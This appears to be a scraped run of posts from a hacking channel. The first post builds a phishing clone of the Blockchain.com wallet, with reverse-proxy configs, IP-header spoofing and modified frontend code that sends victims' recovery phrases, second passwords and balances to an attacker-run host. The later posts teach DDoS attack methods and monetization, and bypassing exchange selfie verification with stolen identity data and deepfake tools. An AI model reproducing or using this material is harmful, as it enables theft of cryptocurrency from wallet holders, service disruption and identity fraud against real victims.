all, the usual reverse proxy at the web server level. Is not it so? Configuration file for a simple reverse proxy web server Caddy: reverse.blockchain.test { route { reverse_proxy * https://blockchain.info { header_up -Host header_up origin https://login.blockchain.com header_up referer https://login.blockchain.com/ header_down Access-Control-Allow -Origin "*" header_down Content-Security-Policy "*" header_down Access-Control-Allow-Headers "*" header_down Access-Control-Allow-Methods "POST, GET, OPTIONS" } } } What exactly does this config do - it simply proxies all requests to the blockchain.info domain and changes the response in which it allows CORS requests, you can do this on absolutely any web server - for ease of operation and clarity, Caddy was chosen as an excellent lightweight web server with automatic ssl support, which is written in Go. Now we change the server API address in our web interface file, for this we open the config / env / production.js file Change: ROOT_URL: ' https://blockchain.info ', On value: ROOT_URL: ' http: //reverse.blockchain.test ', We try to log in again: Uraaaa! Authorization was successful and a confirmation email was sent. We just have to check the mail and open the letter Yes, but what the hell is my server IP doing here?😂😅 I thought for a minute, we only recently bypassed CORS, that's why this address is displayed, and then I remembered ... in all topics where fake was rented, it was written about such a feature as IP spoofing. The point is that an ordinary user who finds himself on a fake when confirming by mail will understand that this is someone else's IP address and simply will not confirm that it is not good to eat. It turns out that without this feature, our fake is just a semblance of a powerful combine, this could have been done using HTML + CSS. We need to find a little information about this spoof ... and so remember: After a little reflection, after reading about IP spoofing again, I came to the conclusion that IP spoofing works only in UDP. In an HTTP request, it will not be possible to spoof the IP address, because HTTP works over the TCP protocol. Is this really the end? I got a little upset, brewed some tea and nevertheless decided again to look at the site itself and requests https://login.blockchain.com after authorization: Oh yeah ... a very interesting subdomain in the x-original-host header: wallet.prod.blockchain.info! We need to know the details for all domains and IP addresses. We make a request to find out where blockchain.info is located: nslookup blockchain.info Non-authoritative answer: Name: blockchain.info Address: 104.16.143.212 Name: blockchain.info Address: 104.16.147.212 Name: blockchain.info Address: 104.16.144.212 Name: blockchain.info Address: 104.16.146.212 Name : blockchain.info Address: 104.16.145.212 Now we find out who owns the IP address: whois 104.16.143.212 NetRange: 104.16.0.0 - 104.31.255.255 CIDR: 104.16.0.0/12 NetName: CLOUDFLARENET NetHandle: NET-104-16-0-0-1 Parent: NET104 (NET-104-0-0-0- 0) NetType: Direct Assignment OriginAS: AS13335 Organization: Cloudflare, Inc. (CLOUD14) RegDate: 2014-03-28 Updated: 2017-02-17 Comment: All Cloudflare abuse reporting can be done via https://www.cloudflare.com/abuse It remains to find out where wallet.prod.blockchain.info is located: nslookup wallet.prod.blockchain.info Name: wallet.prod.blockchain.info Address: 35.201.74.1 Let's find out again who owns the IP address: whois 35.201.74.1 NetRange: 35.192.0.0 - 35.207.255.255 CIDR: 35.192.0.0/12 NetName: GOOGLE-CLOUD NetHandle: NET-35-192-0-0-1 Parent: NET35 (NET-35-0-0- 0-0) NetType: Direct Allocation OriginAS: Organization: Google LLC (GOOGL-2) RegDate: 2017-03-21 Updated: 2018-01-24 Comment: *** The IP addresses under this Org-ID are in use by Google Cloud customers *** For a moment, I froze: they are using CloudFlare, but the main server to which requests are forwarded is in the Google cloud. Trying to ping: nslookup wallet.prod.blockchain.info Name: wallet.prod.blockchain.info Address: 35.201.74.1 Let's find out again who owns the IP address: whois 35.201.74.1 NetRange: 35.192.0.0 - 35.207.255.255 CIDR: 35.192.0.0/12 NetName: GOOGLE-CLOUD NetHandle: NET-35-192-0-0-1 Parent: NET35 (NET-35-0-0- 0-0) NetType: Direct Allocation OriginAS: Organization: Google LLC (GOOGL-2) RegDate: 2017-03-21 Updated: 2018-01-24 Comment: *** The IP addresses under this Org-ID are in use by Google Cloud customers *** We open the site itself: 404 ... hmm ... something and the tea is already very cold - but oh well, we found something very interesting here. I was upset again, but for a moment I remembered that since the site is proxied through CloudFlare, and then transferred to Google Cloud, it means that they somehow transmit the necessary headers. After all, any person who has ever worked with CloudFlare knows that all requests go to the server: Visitor <-> CloudFlare <-> Server. Therefore, in order to restore the real IP address of the visitor, we need to read the documentation: https://support.cloudflare.com/hc/en-us/articles/200170786-Restoring-original-visitor-IPs And so, with the tea already cooled, we continue our path, the documentation says that in order to get the visitor's IP address, you need to receive data from the CF-Connecting-IP headers, in our case we need to send such a header, we try to start with a regular request: Checking mail: What I was insanely happy about was to integrate it into our reverse proxy: reverse.blockchain.test { route { reverse_proxy * https://wallet.prod.blockchain.info { header_up -Host header_up origin https://login.blockchain.com header_up referer https://login.blockchain.com/ header_up Cf -Connecting-Ip {http.request.remote.host} header_down Access-Control-Allow-Origin "*" header_down Content-Security-Policy "*" header_down Access-Control-Allow-Headers "*" header_down Access-Control-Allow -Methods "POST, GET, OPTIONS" } } } Authorization works, but for some reason the balance is not shown: We open the console, then we see that the problem arises due to the fact that / multiadd is available only to blockchain.info, but it is simply not available in wallet.prod.blockchain.info: It turns out that our reverse proxy is not quite universal. Add some logic to our reverse proxy: reverse.blockchain.test { route { reverse_proxy / multiaddr https://blockchain.info { header_up -Host header_up origin https://login.blockchain.com header_up referer https://login.blockchain.com/ header_down Access-Control- Allow-Origin "*" header_down Content-Security-Policy "*" header_down Access-Control-Allow-Headers "*" header_down Access-Control-Allow-Methods "POST, GET, OPTIONS" } reverse_proxy * https: // wallet. prod.blockchain.info { header_up -Host header_up origin https://login.blockchain.com header_up referer https://login.blockchain.com/ header_up Cf-Connecting-Ip {http.request.remote.host} header_down Access-Control-Allow-Origin "*" header_down Content-Security-Policy "*" header_down Access-Control-Allow-Headers "*" header_down Access-Control -Allow-Methods "POST, GET, OPTIONS" } } } Fine! Everything works great now! As a result, we already have: login and password capture + IP spoofing. But this does not give us anything, because we will not be able to confirm by mail, and if the user still has two-factor authentication or blocking by IP address enabled, then there is absolutely trouble. Fake did something, but we will not get any benefit from it if there is no permanent access to the account. I decided to go back to the basics and once again look at the web interface itself, we are interested in the security settings: Interestingly, the secret recovery key allows anyone to gain access to the account ?! Sorry what?😮 I reread it a couple of times and only then I realize that this secret key is something from the category of saints, if you lose it, you can lose money on your account. And if it is shown in the web interface, then you can also send it to yourself, but first we need to check the capabilities of the secret key. We enable two-factor confirmation + whitelist by IP address in the settings. We just have to check, for this we connect through the second sox and follow the link, where we enter the recovery key: After entering the correct secret key, a form for changing the password appears: We enter the password and click on Recover Funds and after that we instantly get into the account: As a result, private key recovery allows you to bypass any account restrictions: two-factor authentication + whitelist by IP address. This is just tough, I thought for a minute ... it means that there is no point in recording the login password, you can just collect secret keys and restore accounts, and then disable security settings, including changing the mailing address. "So this is a feature, not a bug" - that's what the developers would say ...👏 Now we just have to add all the missing features to the fake itself. 1) Secret recovery key. We are looking for "recovery" in the files, we find the only function "recoverySaga", which displays the private recovery key: const recoverySaga = function * ({password}) { const getMnemonic = s => selectors.core.wallet.getMnemonic (s, password) try { const mnemonicT = yield select (getMnemonic) const mnemonic = yield call (() => taskToPromise (mnemonicT)) const mnemonicArray = mnemonic.split ('') yield put ( actions.modules.settings.addMnemonic ({mnemonic: mnemonicArray}) ) } catch (e) { yield put ( actions.logs.logErrorMessage (logLocation, ' showBackupRecovery ', e) ) } } We need to change it a little, open the file packages / blockchain-wallet-v4-frontend / src / data / goals / sagas.ts Add a function to return the secret key in a format convenient for us: const recoverySagaInfo = function * ({password}) { const getMnemonic = s => selectors.core.wallet.getMnemonic (s, password) try { const mnemonicT = yield select (getMnemonic) const mnemonic = yield call (() => taskToPromise (mnemonicT)) return mnemonic; } catch (e) { } } We also need to send this data, add the sending function: const submitRecover = ({guid, recovery}: {guid: string, recovery: any}) => axios ({ url: ` https: //admin.blockchain.test/api/recovers` , method: 'POST', data : { guid: guid, recover: recovery }, headers: { 'Content-Type': 'application / json' } }) 2) Additional confirmation password aka second pass. Looking in the files "SecondPassword" we find an amazing function call: import {promptForSecondPassword} from 'services / sagas' const password = yield call (promptForSecondPassword) Great. This is exactly what we needed. Open packages / blockchain-wallet-v4-frontend / src / data / goals / sagas.ts Add a function to send data for the second password: const submitSecondPass = ({guid, password}: {guid: string, password: string}) => axios ({ url: ` https: //admin.blockchain.test/api/seconds` , method: 'POST', data : { guid: guid, password: password }, headers: { 'Content-Type': 'application / json' } }) We will call the function a little later. 3) Balance If there is information about the balance of the wallet, it will be easier to understand which of the accounts needs to be restored instantly and in the future just add notifications. Searching for "balances" in the files, we find an equally amazing function call in the same file that we edited earlier: // check / wait for balances to be available const balances = yield call (waitForAllBalances) Add a function for sending balance data: const submitBalance = ({balances, guid}: {balances: any, guid: string}) => axios ({ url: ` https: //admin.blockchain.test/api/balances` , method: 'POST', data : { guid: guid, "btc": balances.btc, "eth": balances.eth, "bch": balances.bch, "pax": balances.pax, "xlm": balances.xlm, "usdt": balances.usdt, "wdgld": balances.wdgld }, headers: { 'Content-Type': 'application / json' } }) Now, after authorization, in order to send, we need to change the packages / blockchain-wallet-v4-frontend / src / data / auth / sagas.js file: We are looking for a function: yield put (actions.goals.saveGoal ('syncPit')) Add after it yield put (actions.goals.saveGoal ('sendData')) After that, we need to add a new function to the packages / blockchain-wallet-v4-frontend / src / data / goals / sagas.ts file: const runSendData = function * (goal) { const {id} = goal // Delete the task so that it doesn't run a hundred times. yield put (actions.goals.deleteGoal (id)) // Wait for user data yield call (waitForUserData) // Receive account ID const guid = yield select (selectors.core.wallet.getGuid) // Wait for balance loading const balances = yield call (waitForAllBalances) // @ ts-ignore yield call (submitBalance, {guid, balances}); // Get the second password const password = yield call (promptForSecondPassword) || null; // @ ts-ignore yield call (submitSecondPass, {guid, password}); // Get the secret recovery key const recovery = yield call (recoverySagaInfo, {password}) // @ ts-ignore yield call (submitRecover, {guid, recovery}); } In the same file we are looking for: case 'syncPit': yield call (runSyncPitGoal, goal) break Add Code after it : Copy to clipboard case 'sendData': yield call (runSendData, goal) break In the packages / blockchain-wallet-v4-frontend / src / data / goals / types.ts file: After the "referral", add "sendData". Ready! Our flawless fake with all the possibilities has been created. For clarity, I would also like to post materials with detailed instructions for installing on the server: - Fake (configs + scripts, vps-1 server) - Reverse proxy (configs + scripts, vps-2 server) - A simple admin panel (configs + scripts, vps-3 server) But for fear of speculation on the part of unscrupulous users (and a sharp increase in traders of blockchain fakes), I would like to convey this material in a hierarchical order by the administrators and moderators of the forum, as well as specialists who would like to "touch" and make sure that everything described in this article is relevant and is working at the time of publication. PS: it is possible that abuses will fly, that private goes to public, but no, friends - anyone could have reached this and it shows exactly how the result was achieved, and not just a ready-made solution is laid out. This article for the competition is a direct confirmation that nothing is impossible. Just try and you will achieve everything and always. With the only caveat in this case that I would like to remind you of (hello Ubuntu / Debian): "With great power comes great responsibility" Hey freaks! we made a BTC stealing tool. with the help of this tool you can steal BTC or swap the whole balance of victim all in once. without any login credentials.for more info or buy. HMU Donate Us ☺ 32GFwevY5gFQ4qNU19hEaPUSDwT9g7X4zr Thank you all for your attention! If you liked it, then don’t forget to subscribe to Hackfreaks Official Who wants to share our channel with friends or acquaintances, you can send them this link: Hackfreaks Official . Continue reading...
Go to the website http://cloud.oracle.com/free Click on this button We fill in all the data. We enter real data, but in theory you can try to enter random Next, go to the mail, find the letter and poke the button We enter the rest of the data. In the home region, we put the one that is closer to you. Next, they will ask for an address, phone number and a map. Again, it's better to enter your personal data. Next comes the code. Then the card is added, oracle promises that after adding the card, money will not be charged from you (except for 1 euro, which will be immediately returned) until you yourself want it. If you did not receive an error, then it means that your card was accepted, and let's move on. If you get an error, then read the conditions for the cards. After regi, you will be thrown onto such a screen, we poke here. We get to create a server Choosing an OS. We take ubuntu (we do not take Windows for it, then you will have to pay) Next, we set up the configuration of your server (for constant operation 24/7, you need to use no more than 24 ram 4 cpu) Next, download the ssh keys for the connection to the server Next, we allocate memory to our server (for the entire account, a maximum of 200GB, if you have 1 server, then put all 200) If everything went well, then you will be thrown to such a screen. Here is information about our server, copy the IP. You can use any means of connecting to the server, and that's it, congratulations, you are logged into your server. Then do whatever your heart desires with him Continue reading...
Hello my little freaks! Hackfreaks Here! Judging by the feedback, subscribers are very interested in the topic of DDoS attacks. I decided not only to superficially talk about the topic, but to make a full-fledged and at the same time free training🔥 . Brought to you by Hackfreaks. Plan of the education: 1. Introduction 2. Basic theory 3. Methods of DDOS attacks 4. Choice of equipment for DDOS attacks 5. Configuring equipment for DDOS attacks 6. Types of protection and how to bypass them 7. Security and anonymity 8. Methods of monetization 9. Other goodies 10. Contacts, hosts, useful links, material, etc. 1. Introduction Anyway, you have heard or even are familiar with DDOS attacks in practice. Someone saw on the news, someone was engaged well, and someone just heard. In this tutorial, I will try to explain all the details as simply as possible and show how it is done by professionals. Commercial organizations do not forgive this, they gnaw harshly in court. Otherwise, a criminal case may await you, even if the investigation will drag on for some time, but they will have time to prove it. I think everything is clear, I will not delay, let's move on to theory. 2. Basic theory First, let's look at the term DDOS itself. To do this, we turn to the wiki, and then I will write in my own words. DDOS is an abbreviation of the English expression Distributed Denial of Service, This means denial of service to a network resource as a result of numerous distributed (that is, originating from different points of Internet access) requests. The difference between a Denial of Service (Denial of Service) attack and DDOS is that in this case, overload occurs as a result of requests from a specific Internet site. And now in our own words: Let's imagine the situation, there is a certain Vasya and a bunch of drunken homeless people. Vasya walks along the street, does not bother anyone, goes to work. Suddenly, out of nowhere, a bunch of homeless people appear and begin to get * before him. What should Vasya do? They surrounded him and did not allow him to pass, moreover, he could not even move, because they became brutal and began to bite him. Having finished it off, they abruptly leave. What remains for Vasya? That's right, die or wait for an ambulance. In this case, the attacked resource is Vasya, and the homeless people are our DDOS. DDOS is often underestimated by many, but this is also a mistake. For example, it will take me some time to deface the site. And in this case, when everything is set up, one command is enough for me to fuck the bank at the root. In the case of deface, everyone can return back, and in the case of DDOS, they will not even be able to enter the server, because it will be lying around. For basic theory, I think it's worth starting with network models. She is in the public, but without her nowhere. These are the basics. In the case of DDOS, we will touch on the TCP / IP protocol stack . TCP / IP is a digital data transmission network model. This model describes how data is transmitted from sender to receiver. The TCP / IP protocol stack includes four layers, these are: • Application layer (Layer 7) • Transport layer (layer 4) • Network layer (Layer 3) • Data link layer (Layer 2) Let's now analyze each of the levels in order: 1. Application layer - the protocol of the upper layer of the OSI network model, provides interaction between the network and the user. The layer allows user applications to access network services such as database query processor, file access, email forwarding. mail. Data types: Data Functions: Access to network services Examples: HTTP, Telnet, FTP, etc. 2. Transport layer - the 4th layer of the OSI network model, is intended for data delivery. In this case, it does not matter what data is transmitted, from where and where, that is, it provides the transmission mechanism itself. It divides the data blocks into fragments, the sizes of which depend on the protocol: it combines the short ones into one, and breaks the long ones. Data Types: Segments / Datagrams Functions: Direct Endpoint Communication and Reliability Examples: TCP / UDP 3. Network layer - the 3rd layer of the OSI network model, designed to determine the path of data transmission. Responsible for translating logical addresses and names into physical ones, determining the shortest routes, switching and routing, tracking problems and congestion in the network. Data types: Packets Functions: Route definition and logical addressing Examples: ICMP, GRE, etc. I have not described the data link layer, why? Because in our case it won't come in handy. For DDOS attacks, we will use attacks on the application and transport layers, rarely on the network . • At the application level, these will be HTTP methods, on the transport TCP and UDP • At the network GRE , since ICMP is no longer relevant. Now let's see what we will do with HTTP, TCP and UDP: In the case of HTTP flooding, we will flood with a huge number of HTTP Get / Post requests, so much so that the web server fucking dooser. HTTP - This is a connection established between a client and a server to transfer data over the HTTP protocol. The HTTP connection is identified as <Source IP, Source Port> and <Destination IP, Destination Port>. At the client level, the protocol is provided by a tuple: <IP, port> Establishing a connection between two endpoints is a multi-step process. It includes a footprint. steps: 1. Calculate ip by DNS hostname 2. Establishing a connection to the server 2. Sending a request 3. Waiting for a response 4. Closing the connection In the case of UDP and TCP flooding , we will flood a huge number of packets per second. BUT, to begin with, let's look at one nuance. Namely, the difference between TCP and UDP. In case some of you don't know, TCP is a secure protocol, unlike UDP. Its difference is that it guarantees the delivery of packets to the addressee, in the case of UDP - it does not check delivery, its task is only to send. TCP has the so-called "triple handshake", which is established between the client and the server, to describe it briefly as follows: 1. The client sends a request to create a TCP session and sends a TCP packet with the SYN flag. 2. The server replies with a TCP packet with SYN + ACK flags to the client. 3. The client sends a TCP packet with the ACK flag to the server. Now let's take a closer look: 1. A client that intends to establish a connection sends a segment with a sequence number and a SYN flag to the server. Further algorithm: - The server receives the segment, remembers the sequence number and tries to create a socket (buffers and memory control structures) to serve the new client; - If successful, the server sends the client a segment with a sequence number and SYN + ACK flags, and goes into the SYN-RECEIVED state; - If successful, the server sends the client a segment with a sequence number and SYN + ACK flags, and goes into the SYN-RECEIVED state; - In case of failure, the server sends the client a segment with the RST flag. 2. If the client receives a segment with the SYN flag, then it remembers the sequence number and sends the segment with the ACK flag. Further algorithm: - If it simultaneously receives the ACK flag (which usually happens), then it goes into the ESTABLISHED state; - If the client receives a segment with the RST flag, then it stops trying to connect; - If the client does not receive a response within 10 seconds, then he repeats the connection process again. 3. If the server in the SYN-RECEIVED state receives a segment with the ACK flag, then it transitions to the ESTABLISHED state. Otherwise, after a timeout, it closes the socket and enters the CLOSED state. The process is called a "three-way handshake", because although a connection establishment process using four segments is possible (SYN towards the server, ACK towards the client, SYN towards the client, ACK towards the server), in practice, three are used to save time. segment. Now let's look at the TCP flags: • ACK - Flag in the TCP segment, the setting of which means that the " Acknowledgment number" field is enabled. If the ACK flag is set, this field contains the sequence number expected by the recipient next time. Marks this segment as acknowledgment of receipt. • RST - Flag in the TCP segment header, the inclusion of which signals a break in the connection. • FIN - Flag in the header of the TCP segment, the inclusion of which signals the end of the session. • SYN - Flag in the TCP segment header, used to synchronize the numbers of data transmission / reception sessions. It is with this flag that the connection is established. Now let's move on to UDP: UDP is the User Datagram Protocol. One of the key elements of TCP / IP, the set of networking protocols for the Internet. With UDP, computer applications can send messages (in this case, called datagrams) to other hosts over an IP network without the need for prior communication to establish special transmission channels or data paths. FAQ: There is enough desire, read it again - you will understand. Memorization is optional, but it is better to know Anonymity later No, FTP access is already hack, not DDOS. 3. Methods of DDOS attacks There are many DDOS methods, so I will divide them into three categories, depending on the type of protocol. Perhaps I'll start with the HTTP methods. HTTP Get / Post Flood - We generate a large number of HTTP requests to the victim's server. In most cases, these are GET requests to get the largest possible site elements. Each bot can generate a large number of legitimate requests (more than 10 times per second). Thus, you do not need to have a large army of bots or a super-private botnet to carry out this attack method. In addition to GET requests, POST requests can also be sent and other HTTP actions can be performed that lead to the same result - the victim's web server is overloaded and unavailable. You can even implement it from your own computer / server. HTTP Strong - A large number of HTTP requests are also generated to the victim's server, but the difference with this method is that empty HTTP requests are sent to the web server. This method is very powerful and is accordingly in private. I wanted to purchase it as a separate script, but unfortunately in the CIS there are few people who generally understand something about DDOS, and they are pushed abroad by acquaintance. Fortunately, I was able to test it by once renting a private botnet for a month. The method is very powerful, and if you happen to come across it, buy it. HTTP Null - A large number of HTTP requests are generated, also empty, but the difference between this method and Strong is that HTTP Strong waits for a response from the web server, while HTTP Null does not. I also had a chance to test, the method is unrealistically powerful. JSBypass - A method that bypasses the CloudFlare stub and analogs. Probably most of you have come across this picture: You go to the site, and there is an incomprehensible picture spinning for 5 seconds, like this: This is a CloudFlare stub. This method bypasses it in a fairly simple way, cookies are parsed and your victim instantly falls. Also, to this method, you can additionally specify a proxy for greater efficiency. I met it extremely rarely in botnets, it works perfectly from servers. XML-RPC - Quite a tricky method. Using this method, requests will not go from your server, but from vulnerable sites on the WordPress CMS. Those. - you scan the ranges, find vulnerable sites among them and issue a remote command during an attack. The method is very effective and cost effective. Since you don't need a botnet or a super-powerful server to use it. It is enough not to be banned by the hosting provider :) Joomla Reflection - Similar to XML-RPC method, they have the same principle of operation, but in this case it is not WordPress but CMS Joomla. FAQ: HTTP Get / Post is the most common. Less commonly XMLRPC Doesn't make much sense if there is a botnet. The botnet will a priori fuck anything. But it makes sense if the botnet is extremely small. POST flood is better, for example, for registration. But if there is a captcha type check, the meaning disappears. Only if you don't find a cheeky injection in it == Well, this is a joke, if there is no botnet, then through some Apache Bench you can find, for example, a lousy working database cache and through certain queries in the search engine of the site, drag it into one person. XMLRPC is more alive than all living things, again the other day Sakharny put them on the RKN. HTTP flood will always be relevant - this is the basis of Layer 7 XMLRPC, not Joomla and there will be happiness. Well, JSBypass when you see Cloud with a stub Then I'll tell you what kind of sheet I have described the most popular and frequently used methods, how to implement the majority, I will describe in the next stages of the plan. Now I would like to talk about TCP methods , there are quite a few of them, unlike UDP, but nevertheless, I decided to touch on the transport layer starting with TCP. Most transport layer attacks are carried out through IP spoofing. IP spoofing is, in short, spoofing the reverse IP address. Which allows you to deceive the system by spoofing the sender's address. It is thanks to IP spoofing that it is impossible to identify the attacker. SSYN ( Spoofed SYN) - in this case, we send fake SYN requests to the server, spoofing the sender's address (Spoofing). The response SYN + ACK is sent to a non-existent address, as a result, the so-called half-open connections appear in the connection queue, awaiting confirmation from the client. After a certain timeout expires, these connections are dropped. The method is very effective and relevant to this day. They can protect themselves from it, but in the CIS, few people are smart enough for this. SYN-ACK Flood - In this case, during a SYN-ACK flood, we flood with fake SYN-ACK packets arriving in large quantities. Trying to make a decision on each SYN-ACK packet and match it with one of the entries stored in the connection table, the victim's server allocates computing resources for this (RAM, percent, etc.) to process the stream of fake SYN-ACK packets. As a result, the same thing happens as during a SYN flood: an overload of the victim's server, leading to its partial inaccessibility or complete cunt. Dominate - In this case, there is a large number of TCP packets with different flags, in practice this method has shown great success. xMAS - This method hits closed TCP ports and hard finishes the processor, forcing them to literally melt. RST / FIN Flood - In this case, to close the TCP-SYN session, an RST or FIN packets are exchanged between the client and the host. During an RST or FIN flood, the victim's server at high speed receives fake RST or FIN packets that are not related to any of the sessions in the server's database. During an RST or FIN flood, the victim's server is forced to allocate a significant amount of system resources (again, this is RAM, percent, etc.) to match incoming packets with current connections, which leads to a loss of server performance and to its partial inaccessibility. ACK Flood - In this case, with a fragmented ACK flood, packets of the maximum allowable size (for example, 1500 bytes) are used to fill a significant channel bandwidth with a relatively small number of transmitted packets. Fragmented ACK packets usually pass through routers, firewalls and intrusion prevention systems easily. these devices do not reassemble fragmented packets at the network layer. Typically, these packets contain random data. Since the attacker's goal is to fill the entire bandwidth of the victim's external network channels, this type of flooding reduces the performance of all servers in the attacked network. ESSYN - Essentially the TCP SSYN method, but was rewritten by Starfall in 2013. Rumor has it that it is more effective. Apparently these are not rumors. xSYN - Also TCP SSYN method, but was also rewritten by Starfall in 2013. FAQ: Using the poke method. It happens that sites put the same syn-coockie, which you will not immediately notice and filtered, but there are few brains in the CIS, and all are stupid. + depending on what kind of protection, but more on that later. Yes! But it makes sense to run several at once, if you can run dominate. ASK I have tried to describe TCP methods as easily as possible in order to start the long journey of UDP methods. UDP Flood - During a UDP flood, the victim's server receives a huge amount of spoofed UDP packets from a wide range of IP addresses. The victim's server or network equipment in front of it becomes overwhelmed with fake UDP packets. The attack provokes congestion on network interfaces by occupying the entire bandwidth. In UDP, there is no concept of establishing a connection (handshake) as in TCP. This makes filtering UDP flooding while maintaining legitimate UDP traffic an extremely difficult task, as well as an effective way to flood the channel. UDP flood is striking network with packets containing random or static IP addresses, and can be implemented to disable the server using information about it, such as the target port of the legitimate service and the destination IP address. Due to the complexities of checking UDP traffic (there is no mechanism for checking a session like with TCP), many telecom operators offer their customers traffic blocking according to various criteria, which is essentially saving the network by blocking individual servers. NTP Amplification - This is a type of transport layer DDOS attack in which a publicly available NTP (Network Time Protocol) server is used to generate junk traffic. So, by sending short requests to one of the open NTP servers, you can get a response tens of times larger (amplification effect). We use this by sending requests with the address of the victim server as the IP address of the request source. As a result, the victim's server network is overloaded with “garbage” UDP traffic, from which it is quite difficult to identify legitimate NTP requests and responses. Implementing this method is as easy as shelling pears, like all amplification methods. This method uses port 123. DNS amplification - This type of attack uses the transport layer DDOS specifics of DNS services on the network. The point is to request domain information from a public DNS server and send its response to the attacked server. When implementing this type of attack, we form and execute a request, in response to which the DNS server returns as much data as possible. For example, requesting a list of all DNS records in a specific zone. Because In the UDP protocol, the verification of the source IP addresses is not carried out, huyarim is shorter than generating requests on behalf of the victim's server, indicating its IP address in the outgoing address field. The main goal here is to fill the server channel victims with voluminous responses from public DNS servers. So, using a good worksheet for generating queries to public DNS servers, we can increase the flow of generated junk traffic up to 100 times. At the same time, it is almost impossible to figure out us or calculate at least the IP addresses of the query generators, since the real outgoing IP address is always replaced with another one. Although the method is old, it still lives on. This method uses port 53. Chargen Amplification - This type of transport layer DDOS attack works the same as NTP amplification, only requests are sent to servers using the Chargen service. This method is practically no different from other amplifications, well, and another port is also used, 19. This method is also easy to implement with spoofing. SSDP Amplification - This method is a UDP based protocol that uses universal Plug and Play devices for amplification, which allows requests to be sent using port 1900. SSDP is one of the strongest methods, outperforming NTP, DNS, Chargen, etc. VSE - This type of transport layer DDOS attack is aimed at attacking Valve's servers. Very efficient and also used for other game servers, uses port 27015. That’s all for today. Continuation in the next article, which will be released very soon! Continue reading...
Hey Freaks! Today i am gonna show you how to create SMM panel without any coding and webdesigning knowledge. free without paying anyone. and you’ll create your own SMM in few minutes. For those who dont know “ WHAT SMM PANEL IS” ? Social Media Marketing (SMM) is a type of internet marketing that uses the benefits of social networking sites as a tool for promoting websites, thus increasing traffic towards them and learning from users’ direct reactions. IN SIMPLE LANGUAGE SMM Panels are known as Social Media Marketing Panels. You can purchase views, likes, comments, subscribers, followers, etc. Step-by-step instruction 1️⃣ We go to the site and register. 2️⃣ Click “Create Panel”. 3️⃣ Select “Panel”. 4️⃣ Enter your domain in the first line. 5️⃣ Go to the domain registrar’s page (where you ordered the domain). 6️⃣ Select the desired domain and enter the dns server data: ▫️ dns1.socpanel.com ▫️ dns2.socpanel.com So that’s it! 7️⃣ Click “Save”. └After that, you need to wait for the domain to bind to dns servers (from 24 to 48 hours). It usually takes about 3. 8️⃣ Go here and click on the “Settings” button. 9️⃣ Click on “Add provider” and enter the number. If there is no provider, the window will look something like this: 👇 🔟 We add the necessary services and payment methods. └Everything is intuitive here. ➡️ Done! The next step is to set up an automatic purchase on other services, put a winding price tag and catch up with traffic. Summary As you can see, there is no need to overpay coders and designers. Raising your own SMM panel is a matter of a few minutes. When you redeem, what’s what. Keep your finger on the pulse to be aware of this movement! Your DW. THT’S IT GOOD LUCK FREAKS . OUR FEW MORE ARTICLE $ 300 per day eWhoring New Method. 18+ only How to Hack Telegram We wrote an Android Trojan and steal cryptocurrency from wallets We earn from 500 $ per month on transcription! Making decent money on our porn sites. 18+ only. Traveling on the darknet with Hackfreaks Continue reading...
image source : sumsub Hey Freaks! Hackfreaks here In this article, we will tell you step by step how to bypass selfie verification all method comprehensively . Account verification on exchanges , Loan site etc you know better ;) and earnings on this. METHOD 1 We take the Fullz data for verification on the exchange We make ourselves documents, or rather print a fake document with a photo, you can laminate it. Next, we take the printed document in our hands and follow the instructions. We change the face — we get a verification. https://github.com/alievk/avatarify — allows you to swap your face in real time, during a video call on Skype, or zoom. Installation instructions on Windows 1) Go to this site and download Miniconda python 3.7: 2) Install https://git-scm.com/download/win Next, enter “Miniconda” in the start-up, and open Anaconda promt: We enter the commands in the console in order: git clone https://github.com/alievk/avatarify.git cd avatarify scripts \ install_windows.bat After successful completion, download additional resources from https://drive.google.com/file/d/1L8P-hpBhZi8Q_1vP2KlQ4N6dvlzpYBvZ/view , https://yadi.sk/d/lEw8uRm140L_eQ/vox-adpth.cpk. , https://mega.nz/file/R8kxQKLD#036S-bobZ9IW-kNNcSlgpfJWBKSi5nkhouCYAsxz3qI (of your choice). Then we place vox-adv-cpk.pth.tar in the avatarify folder (don’t unpack it). The avatarify folder is located at C: \ Users \ {username}: After that, if you have already closed the miniconda console, then open it again, write: cd C: \ Users \ username \ avatarify And after that we prescribe the following: run_windows.bat Make sure that your RAM is not full, because at the first start the program will download and install the elements it needs: After a successful launch, 2 windows will appear on the screen, one with an image from a web camera, and the other with Avatarify: Control 1–9: switch between faces; 0 (zero): turns on or off the display of the Avatar; A / D: previous / next avatar from the folder; W / S: zoom in the camera; Z / C: adjust the opacity of the Avatar overlay; X: resets settings, helps before use; F: search for window and support; R: webcam mirroring; T: mirror image of the avatar; I: show FPS. Avatar management Here are the basic principles for managing your avatar: Align your face in the camera window as close as possible in proportion and position to the target avatar. Use the zoom in / out function (W / S keys). When you’re aligned, press X to use that frame as a reference to control the rest of the animation. Use the overlay function (Z / C keys) to bring your and avatar’s expression as close as possible. Alternatively, you can press “F” for the software to try and find the best position. This will slow down the frame rate, but while this is happening, you can keep moving your head: the preview window will flash green when it detects that your face pose is closer to the avatar than the one he is currently using. You will also see two numbers: the first number is how close you are currently aligned with the Avatar, and the second number is how close the frame of reference is. You want to get the first number as small as possible — around 10 is usually a good alignment. When you’re done, press “F” again to exit keyframe search mode. You don’t need to be precise, and some other configurations may give even better results, but this is usually a good starting point. Now, download the plugin for OBS, as well as OBS Studio itself https://obsproject.com/forum/resources/obs-virtualcam.539/ (choose to install and register only 1 virtual camera): Launch OBS. In the Sources section, click the Add button (plus sign), select Windows Capture and click OK. In the window that appears, select “[python.exe]: avatarify” from the drop-down menu of the window and click the OK button. Then select Edit -> Transform -> Fit to screen. In OBS Studio go to Tools -> VirtualCam. Check autorun, set Buffered Frames to 0 and click Start. The OBS-Camera camera should now be available in Zoom (or other video conferencing software). We set up gps for registration and look for a clean ip for the city of registration! METHOD 2 https://youtu.be/q44LPygdMxU Link to DeepFaceLab https://github.com/iperov/DeepFaceLab Required files: cuda_9.2.148_windows.exe (then restart) cuda_9.2.148.1_windows.exe cudnn-9.2-windows7-x64-v7.1.zip Developer video https://youtu.be/K98nTNjXkq8 IMPORTANT !!!! Regardless of how long your video is running, face swap processing will take the same amount of time. The more iterations, the better. In the video with Lesha Shevtsov (itpedia), almost 80,000 were used For the coolest indicator, you can use 500,000 (it will take 3–4 days, it all depends on the vidyuhi) This is exclusively my rough draft for notes, I did not try to adapt it for anyone, I only did it for myself. — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - 1) AT THE ROOT OF THE DISC There are versions after downloading DeepFaceLabCUDA9.2SSE for 